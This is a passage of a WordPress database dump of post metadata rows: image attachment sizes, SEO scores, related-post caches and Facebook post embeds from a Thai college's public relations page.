amera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(13843, 6011, '_wp_attached_file', '2019/07/310762-timeline_20190731_082408.jpg'),
(13844, 6011, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:906;s:6:\"height\";i:1280;s:4:\"file\";s:43:\"2019/07/310762-timeline_20190731_082408.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:43:\"310762-timeline_20190731_082408-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:43:\"310762-timeline_20190731_082408-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:44:\"310762-timeline_20190731_082408-768x1085.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1085;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:44:\"310762-timeline_20190731_082408-725x1024.jpg\";s:5:\"width\";i:725;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:43:\"310762-timeline_20190731_082408-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(13845, 6012, '_wp_attached_file', '2019/07/310762-timeline_20190731_082405.jpg'),
(13846, 6012, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:882;s:6:\"height\";i:1280;s:4:\"file\";s:43:\"2019/07/310762-timeline_20190731_082405.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:43:\"310762-timeline_20190731_082405-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:43:\"310762-timeline_20190731_082405-207x300.jpg\";s:5:\"width\";i:207;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:44:\"310762-timeline_20190731_082405-768x1115.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1115;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:44:\"310762-timeline_20190731_082405-706x1024.jpg\";s:5:\"width\";i:706;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:43:\"310762-timeline_20190731_082405-207x300.jpg\";s:5:\"width\";i:207;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(13847, 6008, '_edit_last', '14'),
(13851, 6008, '_hide_featured', NULL),
(13852, 6008, '_yoast_wpseo_content_score', '30'),
(13853, 6008, '_yoast_wpseo_primary_category', '3'),
(13854, 6008, '_wpas_done_all', '1'),
(13855, 6008, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575081124;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5906;}i:1;a:1:{s:2:\"id\";i:6259;}i:2;a:1:{s:2:\"id\";i:6189;}}}}'),
(13856, 6014, '_edit_lock', '1568453020:14'),
(13857, 6014, '_edit_last', '14'),
(13858, 6015, '_wp_attached_file', '2019/08/050862-01.png'),
(13859, 6015, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2019/08/050862-01.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"050862-01-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"050862-01-300x193.png\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"050862-01-768x494.png\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"050862-01-1024x659.png\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"050862-01-400x258.png\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(13860, 6014, '_thumbnail_id', '6015'),
(13864, 6014, '_hide_featured', NULL),
(13865, 6014, '_yoast_wpseo_content_score', '60'),
(13866, 6014, '_yoast_wpseo_primary_category', '31'),
(13867, 6014, '_wpas_done_all', '1'),
(13872, 6017, '_edit_lock', '1568453039:14'),
(13873, 6017, '_edit_last', '14'),
(13874, 6018, '_wp_attached_file', '2019/08/050862-02.png'),
(13875, 6018, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2019/08/050862-02.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"050862-02-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"050862-02-300x193.png\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"050862-02-768x494.png\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"050862-02-1024x659.png\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"050862-02-400x258.png\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(13876, 6017, '_thumbnail_id', '6018'),
(13880, 6017, '_hide_featured', NULL),
(13881, 6017, '_yoast_wpseo_content_score', '60'),
(13882, 6017, '_yoast_wpseo_primary_category', '31'),
(13883, 6017, '_wpas_done_all', '1'),
(13888, 6020, '_edit_lock', '1568453049:14'),
(13889, 6020, '_edit_last', '14'),
(13890, 6021, '_wp_attached_file', '2019/08/050862-03.png'),
(13891, 6021, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2019/08/050862-03.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"050862-03-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"050862-03-300x193.png\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"050862-03-768x494.png\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"050862-03-1024x659.png\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"050862-03-400x258.png\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(13892, 6020, '_thumbnail_id', '6021'),
(13896, 6020, '_hide_featured', NULL),
(13897, 6020, '_yoast_wpseo_content_score', '60'),
(13898, 6020, '_yoast_wpseo_primary_category', '31'),
(13899, 6020, '_wpas_done_all', '1'),
(13902, 6023, '_edit_lock', '1568453066:14'),
(13903, 6023, '_edit_last', '14'),
(13907, 6023, '_hide_featured', NULL),
(13908, 6023, '_yoast_wpseo_content_score', '60'),
(13909, 6023, '_yoast_wpseo_primary_category', '31'),
(13910, 6023, '_wpas_done_all', '1'),
(13913, 6025, '_wp_attached_file', '2019/08/050862-04.jpg'),
(13914, 6025, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:679;s:6:\"height\";i:960;s:4:\"file\";s:21:\"2019/08/050862-04.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"050862-04-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"050862-04-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"050862-04-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(13915, 6023, '_thumbnail_id', '6025'),
(13918, 6023, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575607494;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:6322;}i:1;a:1:{s:2:\"id\";i:6150;}i:2;a:1:{s:2:\"id\";i:5141;}}}}'),
(13919, 6026, '_edit_lock', '1568453249:14'),
(13920, 6020, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575476589;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:6017;}i:1;a:1:{s:2:\"id\";i:5762;}i:2;a:1:{s:2:\"id\";i:5769;}}}}'),
(13921, 6026, '_edit_last', '14'),
(13922, 6027, '_wp_attached_file', '2019/08/050862-05.png'),
(13923, 6027, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2019/08/050862-05.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"050862-05-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"050862-05-300x193.png\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"050862-05-768x494.png\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"050862-05-1024x659.png\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"050862-05-400x258.png\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(13924, 6026, '_oembed_b83505f348a40f0dc60317852b05b95d', '<div id=\"fb-root\"></div><script async=\"1\" defer=\"1\" crossorigin=\"anonymous\" src=\"https://connect.facebook.net/th_TH/sdk.js#xfbml=1&version=v4.0\"></script><div class=\"fb-post\" data-href=\"https://www.facebook.com/media/set/?set=ms.c.eJxFVW2yRTEE29Eb32X~%3BG3tzpOn9aRQRoV0amt4yoq7912uHwk7aAduu7QP7vPdhHhU3vs~%3BazGdqLiNy3GFbWpj7~_Lm2~_Npd973ifdz3GnKyjrddu2rtxHud~_PKFxcUz~%3BeGVPhfvzHx~_HUG81HzxkTe~%3ByOLVvngt9PNb6~%3BWfs3jOXNsQPy8~_EJ~%3BEq8Cr7Cf2vTTzoR75nnMW~%3B~_XXRAT5hv3se3vxXtuf3X50lq8q8iu99TXu~_1x~%3By~_PTtp~%3Bnn60nw~%3B68t34~_~%3BLb4lfzN8nuK8~_jFU4d4avGKcf6yfIQxXy6fxXp2euev5DvBp5PPRj~%3B~_8BbqC~%3BWEeGd~_ceBlft1~_K268maztRb4K~_uM8C3p5~%3BMpBvmR96JN868nNd~_etkzvvLPZfwJ~_sD30X9W2xeI36Mgc~_Iz7wlY8vRz9GPgrzevyCnyI~%3BGrn1z903wbwO5~_WyePLugw74msdXy~%3BIj1OMc7BP1WuCD~_6CDfXX6DfzNvSdj0POPn4Re2I879Md74Ni~%3BN8~%3BGfgb5jlm8wv3P1Wve~%3BnROYr~%3Be~%3BMH~%3Bu0cH89c3z70nwvvW6G~_G~%3BNTymfn8e4~%3Bq3aMDf~%3BC~_WWz~_St7HwX0Uxm9~%3B8~%3BbdgLeC~_ye4h8xfvfv87pU19MB7suI7WdRPwC~%3B0myA~%3B~_UyFn~%3BPBPbSXv6DPJD6t9R~_nfgT6ufVcMR~%3Bus8vXr3ezX~%3BD7~%3Bo9RzI~%3B~%3BgW9~_75df995kGPMd5KOtsA9t3~%3B6V~%3B4nb3ocu4ln9eVf~%3BA0s4aZE~-.bps.a.861412000901656&type=1&__xts__[0]=68.ARDw9WBlhnkzJkRpajtQa9MoDw8Ei_O_VJVJSB5BEVkRe2IWGzOOsDDc18LQW1bo7A1fBQv7pcwLBXqsKoMO0uTRnbLcxz1TN1VQuDmBEhSPFuycWmL-gk4Pz89eRFG7wzhASrWM1XSCyOPTAGYbpsZg7e2ifOQyvSqJmXilhErG24BWM0H9UTygTdrtGo6tIX1Dv1itYqA4emiH4uTWXfbGdELrIsF8Bioo0kiGJNK3tcikned2ack_ZG57pV3ne5VIcZPJSGOWRXBaQYkh&__tn__=HH-R\" data-width=\"640\"><blockquote cite=\"https://www.facebook.com/media/set/?set=a.861412000901656&type=3\" class=\"fb-xfbml-parse-ignore\"><p>วันศุกร์ที่ ๒๖ กรกฎาคม ๒๕๖๒ คณะผู้บริหาร นำโดย รองฯ ภูมิพัฒน์ แก้วมูล รองฯ ณัฐธารีย์ สิริกุลปัญญาพร รองฯ อานุภาพ...</p>โพสต์โดย <a href=\"https://www.facebook.com/people/งานประชาสัมพันธ์-วทระยอง/100010985913485\">งานประชาสัมพันธ์ วท.ระยอง</a> เมื่อ <a href=\"https://www.facebook.com/media/set/?set=a.861412000901656&type=3\">วันพฤหัสบดีที่ 25 กรกฎาคม 2019</a></blockquote></div>'),
(13925, 6026, '_oembed_time_b83505f348a40f0dc60317852b05b95d', '1564972058'),
(13926, 6026, '_thumbnail_id', '6027'),
(13930, 6026, '_hide_featured', NULL),
(13931, 6026, '_yoast_wpseo_content_score', '60'),
(13932, 6026, '_yoast_wpseo_primary_category', '31'),
(13933, 6026, '_wpas_done_all', '1');
INSERT INTO `wp_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(13936, 6026, '_oembed_5d402eef1bd9a0ad928b6884c3d8b95c', '<div id=\"fb-root\"></div><script async=\"1\" defer=\"1\" crossorigin=\"anonymous\" src=\"https://connect.facebook.net/th_TH/sdk.js#xfbml=1&version=v4.0\"></script><div class=\"fb-post\" data-href=\"https://www.facebook.com/media/set/?set=ms.c.eJxFVW2yRTEE29Eb32X~%3BG3tzpOn9aRQRoV0amt4yoq7912uHwk7aAduu7QP7vPdhHhU3vs~%3BazGdqLiNy3GFbWpj7~_Lm2~_Npd973ifdz3GnKyjrddu2rtxHud~_PKFxcUz~%3BeGVPhfvzHx~_HUG81HzxkTe~%3ByOLVvngt9PNb6~%3BWfs3jOXNsQPy8~_EJ~%3BEq8Cr7Cf2vTTzoR75nnMW~%3B~_XXRAT5hv3se3vxXtuf3X50lq8q8iu99TXu~_1x~%3By~_PTtp~%3Bnn60nw~%3B68t34~_~%3BLb4lfzN8nuK8~_jFU4d4avGKcf6yfIQxXy6fxXp2euev5DvBp5PPRj~%3B~_8BbqC~%3BWEeGd~_ceBlft1~_K268maztRb4K~_uM8C3p5~%3BMpBvmR96JN868nNd~_etkzvvLPZfwJ~_sD30X9W2xeI36Mgc~_Iz7wlY8vRz9GPgrzevyCnyI~%3BGrn1z903wbwO5~_WyePLugw74msdXy~%3BIj1OMc7BP1WuCD~_6CDfXX6DfzNvSdj0POPn4Re2I879Md74Ni~%3BN8~%3BGfgb5jlm8wv3P1Wve~%3BnROYr~%3Be~%3BMH~%3Bu0cH89c3z70nwvvW6G~_G~%3BNTymfn8e4~%3Bq3aMDf~%3BC~_WWz~_St7HwX0Uxm9~%3B8~%3BbdgLeC~_ye4h8xfvfv87pU19MB7suI7WdRPwC~%3B0myA~%3B~_UyFn~%3BPBPbSXv6DPJD6t9R~_nfgT6ufVcMR~%3Bus8vXr3ezX~%3BD7~%3Bo9RzI~%3B~%3BgW9~_75df995kGPMd5KOtsA9t3~%3B6V~%3B4nb3ocu4ln9eVf~%3BA0s4aZE~-.bps.a.861412000901656&type=1&__xts__[0]=68.ARDw9WBlhnkzJkRpajtQa9MoDw8Ei_O_VJVJSB5BEVkRe2IWGzOOsDDc18LQW1bo7A1fBQv7pcwLBXqsKoMO0uTRnbLcxz1TN1VQuDmBEhSPFuycWmL-gk4Pz89eRFG7wzhASrWM1XSCyOPTAGYbpsZg7e2ifOQyvSqJmXilhErG24BWM0H9UTygTdrtGo6tIX1Dv1itYqA4emiH4uTWXfbGdELrIsF8Bioo0kiGJNK3tcikned2ack_ZG57pV3ne5VIcZPJSGOWRXBaQYkh&__tn__=HH-R\" data-width=\"750\"><blockquote cite=\"https://www.facebook.com/media/set/?set=a.861412000901656&type=3\" class=\"fb-xfbml-parse-ignore\"><p>วันศุกร์ที่ ๒๖ กรกฎาคม ๒๕๖๒ คณะผู้บริหาร นำโดย รองฯ ภูมิพัฒน์ แก้วมูล รองฯ ณัฐธารีย์ สิริกุลปัญญาพร รองฯ อานุภาพ...</p>โพสต์โดย <a href=\"https://www.facebook.com/people/งานประชาสัมพันธ์-วทระยอง/100010985913485\">งานประชาสัมพันธ์ วท.ระยอง</a> เมื่อ <a href=\"https://www.facebook.com/media/set/?set=a.861412000901656&type=3\">วันพฤหัสบดีที่ 25 กรกฎาคม 2019</a></blockquote></div>'),
(13937, 6026, '_oembed_time_5d402eef1bd9a0ad928b6884c3d8b95c', '1564972113'),
(13938, 6026, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575554333;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5994;}i:1;a:1:{s:2:\"id\";i:5945;}i:2;a:1:{s:2:\"id\";i:5865;}}}}'),
(13940, 6031, '_wp_attached_file', '2019/08/050862-06.jpg'),
(13941, 6031, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:679;s:6:\"height\";i:960;s:4:\"file\";s:21:\"2019/08/050862-06.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"050862-06-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"050862-06-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"050862-06-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(13971, 6035, '_edit_lock', '1568453116:14'),
(13972, 6035, '_edit_last', '14'),
(13973, 6035, '_thumbnail_id', '6031'),
(13977, 6035, '_hide_featured', NULL),
(13978, 6035, '_yoast_wpseo_content_score', '60'),
(13979, 6035, '_yoast_wpseo_primary_category', '31'),
(13980, 6035, '_wpas_done_all', '1'),
(13981, 6037, '_edit_lock', '1568453309:14'),
(13982, 6037, '_edit_last', '14'),
(13983, 6038, '_wp_attached_file', '2019/08/050862-07.png'),
(13984, 6038, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2019/08/050862-07.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"050862-07-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"050862-07-300x193.png\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"050862-07-768x494.png\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"050862-07-1024x659.png\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"050862-07-400x258.png\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(13985, 6037, '_thumbnail_id', '6038'),
(13989, 6037, '_hide_featured', NULL),
(13990, 6037, '_yoast_wpseo_content_score', '30'),
(13991, 6037, '_yoast_wpseo_primary_category', '31'),
(13992, 6037, '_wpas_done_all', '1'),
(13993, 6037, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575370441;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:6060;}i:1;a:1:{s:2:\"id\";i:5671;}i:2;a:1:{s:2:\"id\";i:4107;}}}}'),
(13994, 6040, '_edit_lock', '1568453203:14'),
(13995, 6040, '_edit_last', '14'),
(13996, 6041, '_wp_attached_file', '2019/08/050862-08.png'),
(13997, 6041, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2019/08/050862-08.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"050862-08-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"050862-08-300x193.png\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"050862-08-768x494.png\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"050862-08-1024x659.png\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"050862-08-400x258.png\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(13998, 6040, '_thumbnail_id', '6041'),
(14002, 6040, '_hide_featured', NULL),
(14003, 6040, '_yoast_wpseo_content_score', '30'),
(14004, 6040, '_yoast_wpseo_primary_category', '31'),
(14005, 6040, '_wpas_done_all', '1'),
(14006, 6043, '_edit_lock', '1568453221:14'),
(14007, 6043, '_edit_last', '14'),
(14008, 6044, '_wp_attached_file', '2019/08/050862-09.jpg'),
